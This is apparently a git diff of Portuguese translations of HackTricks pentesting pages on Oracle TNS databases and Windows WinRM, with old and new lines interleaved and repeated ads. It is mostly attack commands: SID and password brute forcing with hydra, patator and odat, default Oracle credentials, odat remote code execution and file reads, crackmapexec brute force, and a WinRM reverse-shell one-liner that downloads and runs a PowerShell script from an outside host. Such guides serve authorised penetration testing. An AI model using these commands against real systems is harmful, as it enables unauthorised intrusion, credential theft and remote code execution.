2. **Bruteforce do TNS Listener**: Às vezes necessário para estabelecer comunicação.
3. **Enumeração/Bruteforce de Nome SID**: Descobrir nomes de banco de dados (SID).
4. **Bruteforce de Credenciais**: Tentar acessar o SID descoberto.
5. **Execução de Código**: Tentar executar código no sistema.
Para usar os módulos oracle do MSF, você precisa instalar algumas dependências: [**Instalação**](oracle-pentesting-requirements-installation.md)
## Enumeração
## Posts
Ferramentas que podem ser usadas para isso são: nmap, MSF e [tnscmd10g](http://dokfleed.net/files/audit/tnscmd10g.zip).
Confira estes posts:
### Versão do TNS listener
```bash
nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>
msf> use auxiliary/scanner/oracle/tnslsnr_version
#apt install tnscmd10g
tnscmd10g version -p 1521 -h <IP>
```
Outros comandos úteis do TNS listener:
* [https://secybr.com/posts/oracle-pentesting-best-practices/](https://secybr.com/posts/oracle-pentesting-best-practices/)
* [https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573](https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573)
* [https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/](https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/)
* [http://blog.opensecurityresearch.com/2012/03/top-10-oracle-steps-to-secure-oracle.html](http://blog.opensecurityresearch.com/2012/03/top-10-oracle-steps-to-secure-oracle.html)
| **Comando** | **Finalidade** |
| ------------ | ---------------------------------------------------------------- |
| ping | Pingar o listener |
| version | Fornecer saída da versão do listener e informações da plataforma |
| status | Retornar o status atual e variáveis usadas pelo listener |
| services | Despejar dados do serviço |
| debug | Despejar informações de depuração no log do listener |
| reload | Recarregar o arquivo de configuração do listener |
| save\_config | Escrever o arquivo de configuração do listener em um backup |
| stop | Invocar o desligamento do listener |
Se você **receber um erro**, pode ser porque as **versões do TNS são incompatíveis** (Use o parâmetro `--10G` com `tnscmd10`) e se o **erro persistir,** o listener pode estar **protegido por senha** (você pode ver uma lista onde todos os [**erros são detalhados aqui**](https://docs.oracle.com/database/121/ERRMG/TNS-00000.htm#ERRMG-GUID-D723D931-ECBA-4FA4-BF1B-1F4FE2EEBAD7)) — não se preocupe… hydra ao resgate\*\*:\*\*
```
hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener
```
O listener TNS pode ser vulnerável a ataques **MitM**. [Verifique aqui como checar se o servidor está vulnerável e como realizar o ataque (todas as versões até a versão 12c estão incluídas)](tns-poison.md).
### Enumeração de SID
#### **O que é um SID**
O SID (Identificador de Serviço) é essencialmente o nome do banco de dados, dependendo da instalação você pode ter um ou mais SIDs padrão, ou até mesmo um SID definido pelo dba totalmente personalizado.
**Em algumas versões antigas (na 9 funciona)** você poderia solicitar o SID e o banco de dados enviaria para você:
```bash
tnscmd10g status-p 1521 -h <IP> #The SID are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)
#msf1
msf> use auxiliary/scanner/oracle/sid_enum
msf> set rhost <IP>
msf> run
#msf2
msf> use auxiliary/admin/oracle/tnscmd
msf> set CMD (CONNECT_DATA=(COMMAND=STATUS))
msf> set rhost <IP>
msf> run #The SID are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)
```
Se você não conseguir acessar os SIDs dessa forma, será necessário forçá-los por tentativa e erro:
**Força Bruta de SID**
Eu combinei as listas de SID do nmap e do MSF nesta aqui (sem duplicatas):
{% file src="../../.gitbook/assets/sids-oracle.txt" %}
```bash
hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 <IP> oracle-sid
patator oracle_login host=<IP> sid=FILE0 0=sids-oracle.txt -x ignore:code=ORA-12505
./odat.py sidguesser -s $SERVER -d $SID --sids-file=./sids.txt
msf> use auxiliary/admin/oracle/sid_brute #This will use the list located at /usr/share/metasploit-framework/data/wordlists/sid.txt
nmap --script +oracle-sid-brute -p 1521 10.11.1.202 #This will use the list lcated at /usr/share/nmap/nselib/data/oracle-sids
```
Para usar o **oracle\_login** com o **patator**, você precisa **instalar**:
```
pip3 install cx_Oracle --upgrade
```
## **Focando em Contas**
**Conseguiu o SID?** Excelente, agora vamos para a próxima tarefa e extrair as informações da conta do usuário. A partir deste ponto, você pode se conectar ao listener e forçar bruta as credenciais.
**Metasploit** _\*\*scanner/oracle/oracle\_login_ Ele possui um dicionário integrado para os **valores padrão mais populares de informações de conta de usuário** apresentados como login:senha. Aliás, tais entradas padrão representam um dos problemas de segurança mais populares e graves no Oracle.
**Nmap** também pode ajudar aqui com o script _oracle-brute_. Observe que este script **mistura os logins e senhas**, ou seja, ele tenta cada login contra cada senha, e isso leva um bom tempo!
### **Senhas Padrão**
Abaixo estão algumas das senhas padrão associadas ao Oracle:
* **DBSNMP/DBSNMP**O Agente Inteligente usa isso para se comunicar com o servidor de banco de dados (é um trabalho mudar isso)
* **SYS/CHANGE\_ON\_INSTALL**Conta padrão sysdba antes e incluindo o Oracle v9, a partir da versão 10g isso tem que ser diferente!
* **PCMS\_SYS/PCMS\_SYS**Conta padrão x
* **WMSYS/WMSYS**Conta padrão x
* **OUTLN/OUTLN**Conta padrão x
* **SCOTT/TIGER**Conta padrão x
Outras **senhas padrão** podem ser encontradas [aqui](http://www.petefinnigan.com/default/oracle_default_passwords.htm) e [aqui](https://cirt.net/passwords?vendor=Oracle).
As versões 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2 e 11.2.0.3 são vulneráveis a **força bruta offline**. [**Leia mais sobre esta técnica aqui.**](remote-stealth-pass-brute-force.md)
### Força Bruta de Usuário/Senha
Diferentes ferramentas oferecem **listas diferentes de usuário/senha** para oracle:
* **oscan:** _/usr/share/oscanner/accounts.default_ (169 linhas)
* **MSF-1:** _de_ admin/oracle/oracle\_login \_\_/usr/share/metasploit-framework/data/wordlists/oracle\_default\_passwords.csv (598 linhas)
* **MSF-2:** _de scanner/oracle/oracle\_login_ _/usr/share/metasploit-framework/data/wordlists/oracle\_default\_userpass.txt_ (568 linhas)
* **Nmap:** _/usr/share/nmap/nselib/data/oracle-default-accounts.lst_ (687 linhas)
Eu **misturei** todas elas e **removi duplicatas:**
{% file src="../../.gitbook/assets/users-oracle.txt" %}
{% file src="../../.gitbook/assets/pass-oracle.txt" %}
### [Força Bruta](../../generic-methodologies-and-resources/brute-force.md#oraclesql)
Agora, que você **sabe um SID válido e credenciais válidas**. Para se conectar ao banco de dados, você precisa da ferramenta: _**sqlplus**_ e para instalá-la você precisa seguir alguns passos:
[Instalação](oracle-pentesting-requirements-installation.md)
Para fazer login usando credenciais conhecidas:
```
sqlplus <username>/<password>@<ip_address>/<SID>;
```
Se o TNS Listener estiver em uma porta não padrão (por exemplo, TCP/1522):
```
sqlplus <username>/<password>@<ip_address>:<port>/<SID>;
```
Se uma **conta possui privilégios de sistema de banco de dados (sysdba) ou operador de sistema (sysop)**, você pode tentar o seguinte:
```bash
sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba';
#Example:
sqlplus SYSTEM/MANAGER@192.168.0.2/ORCL 'as sysdba'
```
## **Tudo em Um**
**Uma ferramenta interessante é o oscanner**, que tentará obter algum SID válido e, em seguida, fará brute-force para credenciais válidas e tentará extrair algumas informações:
```bash
#apt install oscanner
oscanner -s <IP> -P <PORT>
```
Outra ferramenta que fará tudo isso é [**odat**](https://github.com/quentinhardy/odat):
```bash
git clone https://github.com/quentinhardy/odat.git
cd odat
./odat.py --help #It shouldn't be problems in Kali
./odat.py all -s <IP> -p <PORT>
./odat.py all -s <IP> -p <PORT> -d <SID> #To bruteforce accounts for that SID
```
Com essas opções (_-s_ e _-p_), o ODAT irá **procurar por SID válido** (System ID) em um primeiro passo. Você pode configurar algumas opções para métodos de configuração (por exemplo, lista de palavras ou ataque de força bruta). Por padrão, o ODAT usará uma grande lista de palavras e realizará um pequeno ataque de força bruta.
Se o ODAT **encontrar pelo menos um SID** (por exemplo, _ORCL_), ele irá **procurar por contas Oracle válidas**. Fará isso em **cada SID encontrado**. Você pode especificar algumas opções para credenciais (por exemplo, _--accounts-file_, _--accounts-files_, _--login-as-pwd_).
Para **cada conta válida** (por exemplo, _SYS_) **em cada instância válida** (SID), o ODAT retornará **o que cada usuário Oracle pode fazer** (por exemplo, shell reverso, ler arquivos, tornar-se DBA).
[**Wiki odat**](https://github.com/quentinhardy/odat/wiki)
## Execução Remota de Código
Existem pelo menos duas maneiras diferentes de executar comandos, como usar procedimentos Java e o pacote DBMS\_SCHEDULER. Aliás, você também pode alcançar RCE em caso de injeção SQL em uma aplicação web, desde que, é claro, o usuário que a executa tenha direitos suficientes. Neste estágio, recomendo vivamente preparar a Ferramenta de Ataque ao Banco de Dados Oracle: [ODAT](https://github.com/quentinhardy/odat).
### Instalar ODAT
```bash
git clone https://github.com/quentinhardy/odat.git
cd odat
./odat.py #It shouldn't be problems in Kali
```
### Executar Código via Procedimento Armazenado Java
```bash
./odat.py java -s <IP> -U <username> -P <password> -d <SID> --exec COMMAND
```
[Mais detalhes aqui](oracle-rce-and-more.md#rce-java-store-procedure)
### Executar código via Scheduler
```bash
./odat.py dbmsscheduler -s <IP> -d <SID> -U <username> -P <password> --exec "C:\windows\system32\cmd.exe /c echo 123&gt;&gt;C:\hacK"
```
[Mais detalhes aqui](oracle-rce-and-more.md#rce-scheduler)
### Executar código via Tabelas Externas
```bash
./odat.py externaltable -s <IP> -U <username> -P <password> -d <SID> --exec "C:/windows/system32" "calc.exe"
```
ODAT.py requer o privilégio CREATE ANY DIRECTORY, que, por padrão, é concedido apenas à função DBA, pois tenta executar o arquivo de qualquer diretório e não apenas do "seu" (a versão manual deste ataque requer menos privilégios).
[Mais detalhes aqui.](oracle-rce-and-more.md#rce-external-tables)
## Ler/Escrever arquivos
```bash
./odat.py utlfile -s <IP> -d <SID> -U <username> -P <password> --getFile "C:/test" token.txt token.txt
./odat.py externaltable -s <IP> -U <username> -P <password> -d <SID> --getFile "C:/test" "my4.txt" "my"
```
[Mais detalhes aqui](oracle-rce-and-more.md#read-write-files)
## Elevação de Privilégios
[Mais detalhes aqui](oracle-rce-and-more.md#elevating-privileges)
Você pode usar o módulo [privesc](https://github.com/quentinhardy/odat/wiki/privesc) do odat para escalar privilégios. Nesse link, você pode encontrar **várias maneiras de escalar privilégios usando o odat.**
```bash
./odat.py privesc -s $SERVER -d $ID -U $USER -P $PASSWORD -h #Get module Help
```
Vulnerabilidade testada no oracle 10.1.0.3.0 deve funcionar até 10.1.0.5.0 e supostamente no 11g. Corrigida com a atualização crítica de outubro de 2007 da Oracle.
```bash
msf> use auxiliary/sqli/oracle/lt_findricset_cursor
```
## Ambiente Virtual Gratuito para testes
Se você deseja praticar ataques a bancos de dados Oracle, a maneira mais segura é se registrar para o Oracle Developer Days Virtualbox VM:
{% embed url="http://www.oracle.com/technetwork/database/enterprise-edition/databaseappdev-vm-161299.html" %}
A maior parte das informações neste post foi extraída de: [https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573](https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573) e de [https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/](https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/)
Outras **referências** interessantes:
[http://blog.opensecurityresearch.com/2012/03/top-10-oracle-steps-to-secure-oracle.html](http://blog.opensecurityresearch.com/2012/03/top-10-oracle-steps-to-secure-oracle.html)
## Comandos Automáticos HackTricks
## Comandos Automáticos do HackTricks
```
Protocol_Name: Oracle #Protocol Abbreviation if there is one.
Port_Number: 1521 #Comma separated if there is more than one.
@ -273,14 +72,14 @@ Command: nmap --script "oracle-tns-version" -p 1521 -T4 -sV {IP}
```
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>

225
network-services-pentesting/5985-5986-pentesting-winrm.md
View file

@ -1,73 +1,73 @@
# 5985,5986 - Pentesting WinRM
# 5985,5986 - Testando WinRM
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
<figure><img src="../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
**HackenProof é o lar de todas as recompensas por bugs de criptografia.**
Junte-se ao servidor [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) para se comunicar com hackers experientes e caçadores de recompensas por bugs!
**Seja recompensado sem atrasos**\
As recompensas do HackenProof são lançadas apenas quando os clientes depositam o orçamento de recompensa. Você receberá a recompensa após a verificação do bug.
**Percepções de Hacking**\
Envolver-se com conteúdo que mergulha na emoção e desafios do hacking
**Adquira experiência em pentesting web3**\
Protocolos de blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
**Notícias de Hacking em Tempo Real**\
Mantenha-se atualizado com o mundo acelerado do hacking através de notícias e percepções em tempo real
**Torne-se a lenda do hacker web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
**Últimos Anúncios**\
Fique informado sobre os mais recentes programas de recompensas por bugs lançados e atualizações cruciais na plataforma
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) comece a ganhar com seus hacks!
{% embed url="https://hackenproof.com/register" %}
**Junte-se a nós no** [**Discord**](https://discord.com/invite/N3FrSbmwdy) e comece a colaborar com os melhores hackers hoje!
## WinRM
[Windows Remote Management](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) (WinRM) é um protocolo da Microsoft que **permite o gerenciamento remoto de máquinas Windows** por meio de HTTP(S) usando SOAP. Nos bastidores, ele utiliza o WMI, então você pode pensar nele como uma API baseada em HTTP para WMI.
[Windows Remote Management](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) (WinRM) é um protocolo da Microsoft que **permite a gestão remota de máquinas Windows** via HTTP(S) usando SOAP. Nos bastidores, ele utiliza o WMI, então você pode pensar nele como uma API baseada em HTTP para o WMI.
Se o WinRM estiver habilitado na máquina, é trivial administrar remotamente a máquina a partir do PowerShell. Na verdade, você pode simplesmente entrar em uma sessão remota do PowerShell na máquina (como se estivesse usando SSH!)
A maneira mais fácil de detectar se o WinRM está disponível é verificando se a porta está aberta. O WinRM ouvirá em uma das duas portas:
A maneira mais fácil de detectar se o WinRM está disponível é verificando se a porta está aberta. O WinRM escutará em uma das duas portas:
* **5985/tcp (HTTP)**
* **5986/tcp (HTTPS)**
Se uma dessas portas estiver aberta, o WinRM está configurado e você pode tentar entrar em uma sessão remota.
## **Iniciando uma sessão WinRM**.
## **Iniciando uma Sessão WinRM**.
Podemos configurar o PowerShell para trabalhar com o WinRM. De acordo com a documentação da Microsoft, Enable-PSRemoting é um cmdlet que configura o computador para receber comandos remotos do PowerShell. Se tivermos acesso a um prompt de PowerShell elevado na vítima, podemos habilitá-lo e adicionar qualquer "atacante" como hosts confiáveis. Podemos executar os seguintes dois comandos:
Podemos configurar o PowerShell para funcionar com o WinRM. De acordo com a documentação da Microsoft, Enable-PSRemoting é um cmdlet que configura o computador para receber comandos remotos do PowerShell. Se tivermos acesso a um prompt do PowerShell elevado na vítima, podemos habilitá-lo e adicionar qualquer "atacante" como hosts confiáveis. Podemos executar os seguintes dois comandos:
```
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *
```
Isso adiciona um caractere curinga à configuração trustedhosts. Tenha cuidado com o que isso implica. _Observação: também tive que alterar o tipo de rede na minha máquina de ataque de "Pública" para "Rede de trabalho"._
Isso adiciona um caractere curinga à configuração trustedhosts. Esteja atento ao que isso implica. _Nota: Também tive que alterar o tipo de rede na minha máquina de ataque de "Pública" para rede "de Trabalho"._
Você também pode **ativar** o WinRM **remotamente** _usando o _wmic_:
Você também pode **ativar** o WinRM **remotamente** _\*\*\_usando \_wmic_:
```
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
```
### Testar se está configurado
Uma vez que a máquina de ataque está configurada, use a função `Test-WSMan` para testar se o alvo está configurado para o WinRM. Você deve ver algumas informações retornadas sobre a versão do protocolo e o wsmid:
Uma vez que a máquina de ataque está configurada, use a função `Test-WSMan` para testar se o alvo está configurado para WinRM. Você deve ver algumas informações retornadas sobre a versão do protocolo e wsmid:
![](<../.gitbook/assets/image (161) (1).png>)
![](<../.gitbook/assets/image (162).png>)
Neste caso, o primeiro está configurado e o segundo não.
Neste caso, o primeiro está configurado e o segundo não está.
### Executar um comando
Agora podemos usar o `Invoke-Command` do PowerShell para executar remotamente um comando no alvo através do WinRM. Para executar remotamente o comando `ipconfig` e ver a saída:
Agora podemos usar o `Invoke-Command` do PowerShell para executar remotamente um comando no alvo via WinRM. Para executar remotamente o `ipconfig` e ver a saída:
```
Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
```
@ -77,65 +77,17 @@ Você também pode **executar um comando do seu console PS atual via** _**Invoke
```ruby
Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
```
To execute a script using WinRM, you can use the `Invoke-Command` cmdlet in PowerShell. This cmdlet allows you to run commands or scripts on remote Windows machines.
Here is an example of how to execute a script using WinRM:
```powershell
Invoke-Command -ComputerName <target> -ScriptBlock { <script> }
```
Replace `<target>` with the IP address or hostname of the remote machine you want to execute the script on. Replace `<script>` with the actual script you want to run.
For example, if you want to execute a script named `myscript.ps1` on a remote machine with the IP address `192.168.0.100`, you would use the following command:
```powershell
Invoke-Command -ComputerName 192.168.0.100 -ScriptBlock { C:\path\to\myscript.ps1 }
```
Make sure to provide the correct path to the script file on the remote machine.
When executing a script using WinRM, keep in mind that you may need administrative privileges on the remote machine to perform certain actions. Additionally, ensure that WinRM is properly configured on both the local and remote machines for successful execution.
### Executar um Script
```ruby
Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]
```
### Obter shell reverso
Para obter um shell reverso em um sistema alvo, você pode explorar a vulnerabilidade do serviço WinRM. O WinRM (Windows Remote Management) é um serviço de gerenciamento remoto que permite a administração de sistemas Windows por meio de uma interface de linha de comando.
Aqui está um exemplo de como obter um shell reverso usando o WinRM:
1. Verifique se o serviço WinRM está em execução no sistema alvo. Você pode fazer isso usando a ferramenta `nmap` com o seguinte comando:
```
nmap -p 5985,5986 <endereço IP do sistema alvo>
```
Certifique-se de que as portas 5985 e 5986 estejam abertas e respondendo.
2. Use uma ferramenta como o `evil-winrm` para se conectar ao sistema alvo usando o WinRM. Você pode instalá-lo usando o seguinte comando:
```
gem install evil-winrm
```
3. Depois de instalado, você pode executar o seguinte comando para se conectar ao sistema alvo:
```
evil-winrm -i <endereço IP do sistema alvo> -u <nome de usuário> -p <senha>
```
Substitua `<endereço IP do sistema alvo>`, `<nome de usuário>` e `<senha>` pelos detalhes corretos do sistema alvo.
4. Se as credenciais fornecidas forem válidas, você será conectado ao sistema alvo usando o WinRM. Agora você pode executar comandos no sistema alvo como se estivesse interagindo com um shell local.
Lembre-se de que a obtenção de um shell reverso em um sistema sem permissão é ilegal e deve ser realizada apenas em um ambiente de teste autorizado.
```ruby
Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}
```
### Obter uma sessão do PS
### Obter uma sessão PS
Ou, se você quiser entrar diretamente em uma sessão interativa do PowerShell, use a função `Enter-PSSession`:
Ou, se desejar entrar diretamente em uma sessão interativa do PowerShell, use a função `Enter-PSSession`:
```powershell
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
@ -156,17 +108,17 @@ Exit-PSSession # This will leave it in background if it's inside an env var (New
**A sessão será executada em um novo processo (wsmprovhost) dentro do "alvo"**
### **Forçando a abertura do WinRM**
### **Forçando a Abertura do WinRM**
Se você realmente deseja usar o PS Remoting e o WinRM, mas o alvo não está configurado para isso, você pode "forçá-lo" através de um único comando. Eu não recomendaria isso, mas se você realmente quiser usar o WinRM ou o PSRemoting, faça dessa maneira. Por exemplo, usando o PSExec:
Se você realmente deseja usar a Remoção PS e o WinRM, mas o alvo não está configurado para isso, você pode "forçá-lo" através de um único comando. Eu não recomendaria isso, mas se você realmente quiser usar o WinRM ou PSRemoting, então faça dessa maneira. Por exemplo, usando o PSExec:
```
PS C:\tools\SysinternalsSuite> .\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"
```
Agora podemos entrar em uma sessão PS remota no alvo.
Agora podemos entrar em uma sessão remota do PS na vítima.
### Salvando e Restaurando sessões
Isso **não funcionará** se a **linguagem** estiver **restrita** no computador remoto.
Isso **não funcionará** se o **idioma** estiver **restrito** no computador remoto.
```ruby
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
@ -178,43 +130,41 @@ $sess1 = New-PSSession -ComputerName <computername> [-SessionOption (New-PSSessi
#And restore it at any moment doing
Enter-PSSession -Session $sess1
```
Dentro dessas sessões, você pode carregar scripts do PS usando o _Invoke-Command_
Dentro destas sessões você pode carregar scripts do PS usando _Invoke-Command_
```ruby
Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1
```
### Erros
Se você encontrar o seguinte erro:
Se encontrar o seguinte erro:
`enter-pssession : Falha ao conectar ao servidor remoto 10.10.10.175 com a seguinte mensagem de erro: O cliente WinRM não pode processar a solicitação. Se o esquema de autenticação for diferente de Kerberos, ou se o computador cliente não estiver associado a um domínio, então o transporte HTTPS deve ser usado ou a máquina de destino deve ser adicionada à configuração de TrustedHosts. Use o comando winrm.cmd para configurar TrustedHosts. Observe que os computadores na lista TrustedHosts podem não ser autenticados. Você pode obter mais informações sobre isso executando o seguinte comando: winrm help config. Para obter mais informações, consulte o tópico de Ajuda sobre solução de problemas remotos (about_Remote_Troubleshooting).`
`enter-pssession : A conexão com o servidor remoto 10.10.10.175 falhou com a seguinte mensagem de erro: O cliente WinRM não pode processar a solicitação. Se o esquema de autenticação for diferente do Kerberos, ou se o computador cliente não estiver associado a um domínio, então o transporte HTTPS deve ser usado ou a máquina de destino deve ser adicionada à configuração de TrustedHosts. Use winrm.cmd para configurar TrustedHosts. Observe que os computadores na lista TrustedHosts podem não ser autenticados. Você pode obter mais informações sobre isso executando o seguinte comando: winrm help config. Para obter mais informações, consulte o tópico de Ajuda sobre Solução de Problemas Remotos.`
Tente no cliente (informações obtidas [aqui](https://serverfault.com/questions/657918/remote-ps-session-fails-on-non-domain-server)):
A tentativa no cliente (informações de [aqui](https://serverfault.com/questions/657918/remote-ps-session-fails-on-non-domain-server)):
```ruby
winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
```
<figure><img src="../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
**HackenProof é o lar de todas as recompensas por bugs de criptografia.**
Junte-se ao servidor [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) para se comunicar com hackers experientes e caçadores de bugs!
**Seja recompensado sem atrasos**\
As recompensas do HackenProof são lançadas apenas quando seus clientes depositam o orçamento de recompensa. Você receberá a recompensa depois que o bug for verificado.
**Percepções de Hacking**\
Envolver-se com conteúdo que explora a emoção e os desafios do hacking
**Adquira experiência em pentesting web3**\
Protocolos de blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
**Notícias de Hacking em Tempo Real**\
Mantenha-se atualizado com o mundo acelerado do hacking através de notícias e insights em tempo real
**Torne-se uma lenda hacker web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
**Últimos Anúncios**\
Fique informado sobre os novos programas de recompensas por bugs lançados e atualizações cruciais da plataforma
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) e comece a ganhar com seus hacks!
{% embed url="https://hackenproof.com/register" %}
**Junte-se a nós no** [**Discord**](https://discord.com/invite/N3FrSbmwdy) e comece a colaborar com os melhores hackers hoje!
## Conexão WinRM no Linux
### Força Bruta
Tenha cuidado, forçar a entrada no winrm pode bloquear usuários.
Tenha cuidado, forçar a entrada no WinRM pode bloquear usuários.
```ruby
#Brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
@ -227,26 +177,6 @@ crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionT
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm
```
### Usando evil-winrm
O evil-winrm é uma ferramenta de linha de comando que permite a um testador de penetração explorar e comprometer sistemas Windows que possuem o serviço WinRM habilitado. O WinRM (Windows Remote Management) é um protocolo de gerenciamento remoto que permite a administração de sistemas Windows por meio de uma interface de linha de comando.
Para usar o evil-winrm, primeiro é necessário instalar a gem do Ruby. Em seguida, execute o seguinte comando para instalar o evil-winrm:
```
gem install evil-winrm
```
Depois de instalado, você pode usar o evil-winrm para se conectar a um sistema Windows com o WinRM habilitado. Para isso, utilize o seguinte comando:
```
evil-winrm -i <IP> -u <username> -p <password>
```
Substitua `<IP>` pelo endereço IP do sistema alvo, `<username>` pelo nome de usuário válido e `<password>` pela senha correspondente. Se as credenciais fornecidas estiverem corretas, você será conectado ao sistema alvo e poderá executar comandos remotamente.
